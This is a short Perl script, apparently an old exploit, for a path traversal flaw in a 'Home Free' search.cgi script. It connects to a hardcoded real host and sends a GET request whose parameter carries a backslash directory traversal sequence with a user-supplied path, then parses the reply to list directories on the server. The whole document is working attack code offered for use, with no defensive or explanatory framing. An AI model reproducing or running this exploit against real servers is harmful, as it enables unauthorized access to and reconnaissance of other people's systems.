#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#

use IO::Socket;

if ($ARGV[0] eq "") { die "no argument\n"; }

$asoc = IO::Socket::INET->new(Proto     => "tcp",
                              PeerAddr  => "members.antionline.com",
                              PeerPort  => 80) ||
                die "can't connect to host: $!";

select($asoc);
$| = 1;

print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";

while(<$asoc>) {
        if ($_ =~ /.+HREF.+TD.+/) {
                @parts = split("\"", $_);
                $foo = $parts[1];
                @parts = split("/", $foo);
                print STDOUT $parts[3];
                print STDOUT "\n";
        }
}
close(ASOC);